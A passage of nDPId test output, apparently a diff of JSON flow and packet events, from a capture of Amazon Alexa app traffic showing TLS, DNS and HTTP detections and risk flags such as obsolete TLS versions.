O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=Images-na.ssl-images-amazon.com","alpn":"h2,http\/1.1","fingerprint":"39:3D:27:B3:4D:FA:B4:04:AB:48:7F:5C:CB:A9:9A:95:F5:22:2A:52"}} +00927{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2892,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195983,"flow_last_seen":1490976196039,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1667,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1490976196039,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01348{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2894,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195983,"flow_last_seen":1490976196041,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4563,"flow_avg_l4_payload_len":570,"midstream":0,"thread_ts_msec":1490976196041,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","server_names":"images-na.ssl-images-amazon.com,images-eu.ssl-images-amazon.com,images-fe.ssl-images-amazon.com,m.media-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=Images-na.ssl-images-amazon.com","alpn":"h2,http\/1.1","fingerprint":"39:3D:27:B3:4D:FA:B4:04:AB:48:7F:5C:CB:A9:9A:95:F5:22:2A:52"}} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2910,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_packet_id":2,"flow_last_seen":1490976196075,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976196075,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwIa5AAOcGR5A27xyyrBAq2AG74sBbwNFvZBCniXASH\/4cPAAAAgQFtAEDAwY="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2911,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_packet_id":3,"flow_last_seen":1490976196075,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976196075,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoLWpAAEAG4tysECrYNu8csuLAAbtkEKeJW8DRcFAQAVdmrQAA"} 
+00959{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2913,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976196016,"flow_last_seen":1490976196079,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976196079,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":58048,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01107{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2929,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976196016,"flow_last_seen":1490976196143,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976196143,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":58048,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} +00707{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1490976071237,"flow_last_seen":1490976075957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":2126,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":28,"flow_first_seen":1490976071286,"flow_last_seen":1490976075975,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8626,"flow_avg_l4_payload_len":308,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45693,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1490976071306,"flow_last_seen":1490976075950,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5104,"flow_avg_l4_payload_len":255,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45694,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1490976071349,"flow_last_seen":1490976075957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4754,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45695,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1490976071380,"flow_last_seen":1490976075949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6831,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45696,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1490976071385,"flow_last_seen":1490976075957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":675,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45697,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1490976071583,"flow_last_seen":1490976075957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":574,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":33,"flow_first_seen":1490976064452,"flow_last_seen":1490976068180,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":17572,"flow_avg_l4_payload_len":532,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54434,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1490976064328,"flow_last_seen":1490976064897,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5630,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42148,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2942,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976196223,"flow_last_seen":1490976196223,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976196223,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2942,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_packet_id":1,"flow_last_seen":1490976196223,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976196223,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Y0xAAEAG+qKsECrYNFXRj5ZTAbu3TOm6AAAAAKAC\/\/+mLwAAAgQFtAQCCAoA9or2AAAAAAEDAwg="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2943,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_packet_id":2,"flow_last_seen":1490976196257,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976196257,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqu40VdGPrBAq2AG7llOp3LO0t0zpu6AScSBd6wAAAgQFtAQCCApt5QucAPaK9gEDAwg="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2944,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_packet_id":3,"flow_last_seen":1490976196259,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976196259,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0Y01AAEAG+qmsECrYNFXRj5ZTAbu3TOm7qdyztYAQAVf8fgAAAQEICgD2ivlt5Quc"} 
+01076{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2945,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976196223,"flow_last_seen":1490976196261,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976196261,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01133{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2950,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976196223,"flow_last_seen":1490976196300,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1642,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1490976196300,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": 
{"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01606{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2952,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976196223,"flow_last_seen":1490976196301,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3656,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1490976196301,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3210,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976196840,"flow_last_seen":1490976196840,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1490976196840,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":2707,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3210,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":158,"flow_packet_id":1,"flow_last_seen":1490976196840,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1490976196840,"pkt":"AMDKkaPvePiC0\/vCCABFAAA\/WmdAAEARM02sECrYrBAqAQqTADUAK8ZJ2BYBAAABAAAAAAAABmZscy1uYQZhbWF6b24DY29tAAABAAE="} 00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3210,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976196840,"flow_last_seen":1490976196840,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1490976196840,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":2707,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"fls-na.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3347,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":158,"flow_packet_id":2,"flow_last_seen":1490976196938,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1490976196938,"pkt":"ePiC0\/vCAMDKkaPvCABFAABP7ApAAEARoZmsECoBrBAq2AA1CpMAO2jR2BaBgAABAAEAAAAABmZscy1uYQZhbWF6b24DY29tAAABAAHADAABAAEAAAA7AARIFc55"} 00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3347,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976196840,"flow_last_seen":1490976196938,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976196938,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":2707,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"fls-na.amazon.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"72.21.206.121"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3351,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976196942,"flow_last_seen":1490976196942,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976196942,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3351,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_packet_id":1,"flow_last_seen":1490976196942,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976196942,"pkt":"AMDKkaPvePiC0\/vCCABFAAA85QlAAEAGaDusECrYSBXOebn1AbuZi243AAAAAKAC\/\/8K4AAAAgQFtAQCCAoA9os+AAAAAAEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3353,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_packet_id":2,"flow_last_seen":1490976197023,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976197023,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwSYFAAOcGXM9IFc55rBAq2AG7ufUB00CKmYtuOHASH\/5wwgAAAgQFtAEDAwY="} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3354,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_packet_id":3,"flow_last_seen":1490976197024,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976197024,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo5QpAAEAGaE6sECrYSBXOebn1AbuZi244AdNAi1AQAVe7MwAA"} 
-00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3355,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976196942,"flow_last_seen":1490976197026,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976197026,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3357,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976197297,"flow_last_seen":1490976197297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976197297,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3357,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_packet_id":1,"flow_last_seen":1490976197297,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976197297,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8At9AAEAGSmasECrYSBXOebn2AbvarIm+AAAAAKAC\/\/+uEwAAAgQFtAQCCAoA9othAAAAAAEDAwg="} 
-00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3361,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_packet_id":2,"flow_last_seen":1490976197355,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976197355,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw5DlAAOcGwhZIFc55rBAq2AG7ufYaDpo72qyJv3ASH\/6iLAAAAgQFtAEDAwY="} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3362,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_packet_id":3,"flow_last_seen":1490976197356,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976197356,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoAuBAAEAGSnmsECrYSBXOebn2AbvarIm\/Gg6aPFAQAVfsnQAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3363,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976197297,"flow_last_seen":1490976197357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976197357,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
